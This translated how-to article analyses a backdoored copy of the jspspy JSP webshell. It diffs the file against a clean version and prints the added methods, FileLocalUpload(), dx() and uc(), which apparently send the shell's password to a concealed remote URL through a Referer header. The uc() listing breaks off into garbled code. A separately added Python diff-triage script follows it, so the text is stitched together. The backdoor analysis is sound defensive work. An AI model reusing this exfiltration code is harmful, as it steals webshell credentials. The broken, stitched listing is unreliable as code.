2025-04-02 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
At first glance, this is jspspy.
Young people, don't worry. Let's download the whole project first and then analyze it carefully. Comparing the file sizes of x7.jsp and the xia.jsp below it, we find that x7.jsp is 2 KB larger than xia.jsp. xia.jsp is known to be a version of jspspy as well.
So we open x7.jsp and xia.jsp and try to find where the extra 2 KB comes from. As Java beginners, we don't seem able to read through the code of every function module of jspspy, so instead we compare the text content with a command that ships with Windows (emmmm, similar to the diff command on Linux).
Use the redirection (pipe) symbol to write the differing parts of the two JSP files to a txt document.
When we open the txt file and start to analyze it, a problem shows up almost immediately.
Note that line 23 of the txt document shows x7.jsp defining an additional variable, sxm, whose value is the value of PW.
So let's start by working out what the newly defined sxm variable in x7.jsp is for.
Open x7.jsp in an editor and use Ctrl+F to search for sxm in the current file.
This takes us straight to line 854.
There we find three new methods (functions, in C terms): uc(), dx() and FileLocalUpload(). We locate and read the code of each of these methods in turn.
FileLocalUpload() method

    public static String FileLocalUpload(String reqUrl, String fckal, String recvEncoding) {
        HttpURLConnection url_con = null;
        String responseContent = null;
        try {
            // Outbound HTTP POST to reqUrl
            URL url = new URL(reqUrl);
            url_con = (HttpURLConnection) url.openConnection();
            url_con.setRequestMethod("POST");
            // The second argument travels in the Referer header of the request
            url_con.setRequestProperty("REFERER", "" + fckal + "");
            // connectTimeOut and readTimeOut are not declared in this method
            System.setProperty("sun.net.client.defaultConnectTimeout", String.valueOf(connectTimeOut));
            System.setProperty("sun.net.client.defaultReadTimeout", String.valueOf(readTimeOut));
            url_con.setDoOutput(true);
            url_con.getOutputStream().flush();
            url_con.getOutputStream().close();
            // Read the whole response body, line by line
            InputStream in = url_con.getInputStream();
            BufferedReader rd = new BufferedReader(new InputStreamReader(in, recvEncoding));
            String tempLine = rd.readLine();
            StringBuffer tempStr = new StringBuffer();
            String crlf = System.getProperty("line.separator");
            while (tempLine != null) {
                tempStr.append(tempLine);
                tempStr.append(crlf);
                tempLine = rd.readLine();
            }
            responseContent = tempStr.toString();
            rd.close();
            in.close();
        } catch (IOException e) {
            // errors are silently swallowed
        } finally {
            if (url_con != null) {
                url_con.disconnect();
            }
        }
        return responseContent;
    }
dx() method

    public static String SysInfo = "=?. /.. /:";

    // Returns SysInfo reversed, character by character
    public static String dx() {
        String s = new String();
        for (int i = SysInfo.length() - 1; i >= 0; i--) {
            s += SysInfo.charAt(i);
        }
        return s;
    }
uc() method

    public static String uc(String str) {
        String c = "\n\r";
        long d=127, f=11, j=12, h=14, m=31, r=83, k=1, n=8, s=114, u=-5, v=5, a=0;
        StringBuffer sb = new StringBuffer();
        char[] ch = str.toCharArray();
        for (int i = 0; i < ch.length; i++) {
            a = (int)ch[i];
            if(a==d) a=13;
            if(a==f) a=10;
            if(a==j) a=34;
            if((a>= h) & (aqqk) & & (aqq53) & & (axi48) & & (a)
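The diff-then-search workflow described above (compare the two files, spot the new sxm variable, follow it to the new methods) can be scripted. The following is an added example, not code from the original article or from jspspy; BASE and SUSPECT are constructed stand-ins for xia.jsp and x7.jsp, and the function names are hypothetical.

```python
import difflib
import re

IDENT = re.compile(r"[A-Za-z_]\w*")
# Java static method declaration: "... static <type> <name>("
METHOD = re.compile(r"\bstatic\s+[\w.\[\]<>]+\s+(\w+)\s*\(")

def added_lines(base, suspect):
    """(line_no, text) for every line of `suspect` that `base` does not have."""
    s = suspect.splitlines()
    sm = difflib.SequenceMatcher(None, base.splitlines(), s, autojunk=False)
    return [(j + 1, s[j]) for tag, _, _, j1, j2 in sm.get_opcodes()
            if tag in ("insert", "replace") for j in range(j1, j2)]

def triage(base, suspect):
    """Diff first, then follow each identifier the baseline never mentions."""
    fresh = set(IDENT.findall(suspect)) - set(IDENT.findall(base))
    added = added_lines(base, suspect)
    methods = [m for _, text in added for m in METHOD.findall(text) if m in fresh]
    uses = {name: [n for n, line in enumerate(suspect.splitlines(), 1)
                   if re.search(rf"\b{re.escape(name)}\b", line)]
            for name in sorted(fresh)}
    return {"added": added, "new_methods": methods, "uses": uses}

# Constructed stand-ins for xia.jsp (baseline) and x7.jsp (suspect); the method
# bodies are stubs and the final call line is invented for the demo.
BASE = """\
<%!
private static final String PW = "changeme";
public static String listDir(String p) { return p; }
%>
<% if (PW.equals(request.getParameter("p"))) { out.print(listDir("/")); } %>
"""
SUSPECT = """\
<%!
private static final String PW = "changeme";
String sxm = PW;
public static String listDir(String p) { return p; }
public static String dx() { return ""; }
public static String uc(String str) { return str; }
public static String FileLocalUpload(String reqUrl, String fckal, String recvEncoding) { return null; }
%>
<% if (PW.equals(request.getParameter("p"))) { out.print(listDir("/")); } %>
<% FileLocalUpload(uc(dx()), sxm, "UTF-8"); %>
"""
if __name__ == "__main__":
    report = triage(BASE, SUSPECT)
    print("added lines:", [n for n, _ in report["added"]])
    print("new methods:", report["new_methods"], "sxm on:", report["uses"]["sxm"])
```

Run against a known-good copy of a file, the same triage also works for checking any downloaded tool for code that was added after the fact.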